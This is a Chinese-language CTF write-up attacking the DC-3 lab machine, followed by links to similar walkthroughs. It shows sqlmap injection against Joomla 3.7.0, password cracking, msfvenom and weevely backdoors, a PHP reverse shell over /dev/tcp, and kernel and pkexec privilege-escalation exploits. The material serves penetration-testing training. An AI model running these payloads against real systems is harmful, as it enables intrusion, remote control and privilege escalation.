【CTF】靶机:DC-3

简介: 本靶机适合初学者进行练习,适合已经了解渗透流程,有整体思路的初学者进行学习。 本文将从头讲解,并配有视频教程。

靶机下载地址
链接:https://pan.baidu.com/s/1t0Tppz4tV6whenJMd2KnEw
提取码:6hac
--来自百度网盘超级会员V4的分享
视频教程
https://www.bilibili.com/video/BV11a411d78T

收集信息
扫描靶机ip与端口
请输入图片描述
我们看到靶机只开放了80端口
于是我们访问网站,并识别出网站程序为joomla
请输入图片描述
于是我们使用专门针对joomla的扫描工具joomscan
joomscan -u http://192.168.226.136
请输入图片描述
kali没有这款工具的,可以使用apt install joomscan命令进行安装
我们打开joomlascan后,对网站进行扫描
请输入图片描述
我们得到了后台地址
http://192.168.226.136/administrator/
与joomla的版本 3.7.0
于是,我们使用searchsploit进行扫描
searchploit joomla 3.7.0
请输入图片描述
我们找到sql注入漏洞,打开文本
searchploit -p 42033
我们看到使用方法,直接运行sqlmap即可
请输入图片描述

sqlmap

-u url

–risk (1-3)

–level (1-5)

–random-agent

–dbs

-p list[X]

-D db

–tables //show all tables in db

-T table

–columns //show all columns selected by table

--dump //查看字段名

sqlmap -u "http://192.168.226.136/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

sqlmap -u "http://192.168.226.136/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] --batch -D joomladb --tables

sqlmap -u "http://192.168.226.136/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T "#__users" -C username,password -dump

请输入图片描述
请输入图片描述

john解密哈希

我们创建一个文本
vi 1.txt
输入哈希密码
john --show 1.txt
请输入图片描述
解密成功snoopy

后门生成

法1:msfvenom

msfvenom -p php/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=1234 -f raw > shell.php

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.226.129 LPORT=4444 -f raw > shell.php
请输入图片描述

进入后台,编辑模板
请输入图片描述
创建文件,编写文件,放入我们准备好的木马源码
请输入图片描述
进入msf
请输入图片描述
输入

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp
请输入图片描述

设置监听地址,即kali地址

set lhost 192.168.226.129

输入run运行

然后我们就拿到了shell

python -c 'import pty;pty.spawn("/bin/bash")'
获得交互shell

法2:weevely(无回显)

生成Shell

weevely generate <文件名>

weevely generate 123456 shell.php

weevely http://192.168.226.137/templates/beez3/7723.php 123456

python -m http.server 9999

法3:反弹shell

反弹shell,就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。

通俗点说,反弹shell就是一种反向链接,与正向的ssh等不同,它是在对方电脑执行命令连接到我方的攻击模式,并且这种攻击模式必须搭配远程执行命令漏洞来使用。

由于防火墙等限制,对方机器只能发送请求,不能接收请求

对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机,都是未知,建立一个服务端,让恶意程序主动连接,才是上策。

那我们开始吧!
首先,上传代码
请输入图片描述

<?php system("bash -c 'bash -i >& /dev/tcp/192.168.64.154/8888 0>&1'");?>

下来,进行监听

nc -l -vv -p 8888
请输入图片描述

然后进入shell

利用漏洞提权
法1:

CVE:[2016-4557]

Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation - Linux local Exploit (exploit-db.com)

https://www.zacarx.com/a/aa/39772.zip

python -m SimpleHTTPServer 888
请输入图片描述
shell端解压,运行
请输入图片描述
请输入图片描述
拿到权限
去家目录,拿到flag
请输入图片描述

法2:
CVE-2021-4034漏洞exp

https://github.com/berdav/CVE-2021-4034

利用脚本:https://www.zacarx.com/a/aa/CVE-2021-4034-main.zip

我们下载脚本
请输入图片描述
解压,运行脚本
操作如图
请输入图片描述
拿到flag!!
请输入图片描述

目录
相关文章
|
2月前
|
SQL 安全 Shell
vulnhub靶机实战_DC-3
本文介绍DC-3靶机渗透测试全过程,涵盖环境搭建、信息扫描、SQL注入、权限提升等环节。通过Joomla漏洞获取管理员密码,上传木马并提权至root,最终获取flag,是一套完整的渗透实战流程。
708 1
|
2月前
|
SQL Shell 网络安全
vulnhub靶机实战_DC-8
本文介绍DC-8靶机渗透全过程,涵盖环境搭建、信息扫描、SQL注入、密码爆破、反向Shell获取及提权。利用sqlmap与john工具破解用户凭据,通过Web表单执行命令并获取root权限,最终读取flag完成渗透测试。
331 0
|
2月前
|
关系型数据库 MySQL 网络安全
vulnhub靶机实战_DC-7
本文介绍DC-7靶机渗透测试全过程,包括靶机下载、VMware导入、网络配置、Nmap扫描发现开放80和22端口,通过信息搜集获取数据库凭证,尝试登录SSH成功,获得系统访问权限。适合网络安全学习者实践渗透流程。
149 0
|
2月前
|
中间件 测试技术 应用服务中间件
vulnhub靶机实战_DC-5
本教程介绍如何下载并配置DC-5靶机进行安全测试。内容包括靶机下载链接、VMware导入步骤、网络设置及Nmap扫描分析,帮助快速搭建渗透测试环境。
228 0
|
2月前
|
存储 安全 Shell
vulnhub靶机实战_DC-4
本文介绍了DC-4靶机渗透测试的完整过程,包括靶机下载、环境搭建、信息扫描、漏洞利用、提权以及最终获取flag的详细步骤。通过使用工具如nmap、Hydra进行端口扫描与密码爆破,结合反向Shell与teehee命令实现权限提升,最终成功获取系统flag。内容详实,适合网络安全学习与实践。
440 0
vulnhub靶机实战_DC-4
|
2月前
|
安全 网络安全 开发工具
vulnhub靶机实战_DC-2
本文介绍了DC-2靶机的渗透测试实战过程,涵盖靶机下载、环境搭建、信息扫描、漏洞利用、权限提升及最终提权获取flag的完整流程。内容包括使用nmap扫描、WPScan和Hydra工具爆破登录信息,绕过rbash限制,利用git提权等关键技术步骤。
161 0
|
2月前
|
安全 网络安全 数据库
vulnhub靶机实战_DC-1
本实验通过启动靶机、扫描漏洞、攻击Drupal服务、获取数据库权限、提权至root,最终成功获取所有flag,完成渗透测试目标。
249 0
vulnhub靶机实战_DC-1
|
安全 Linux 网络安全
Neos的渗透测试靶机练习——DC-3
Neos的渗透测试靶机练习——DC-3
176 4
|
安全 Shell 网络安全
Neos的渗透测试靶机练习——DC-1
Neos的渗透测试靶机练习——DC-1
243 4
|
安全 Shell 网络安全
DC-2靶机上了解和练习WordPress框架
本文介绍了在一个名为DC2的虚拟环境中进行渗透测试的过程。首先通过扫描发现SSH和Web端口,并进行全端口扫描以寻找隐藏端口。接着通过信息收集、漏洞利用(如SQL注入、文件上传漏洞等)、反弹Shell及提权等步骤逐步攻陷目标系统。文章详细描述了使用Cewl生成字典、Dirsearch扫描目录、Wpscan枚举WordPress用户等技巧,并最终通过SSH登录和Git命令实现了提权,获取多个flag。
244 3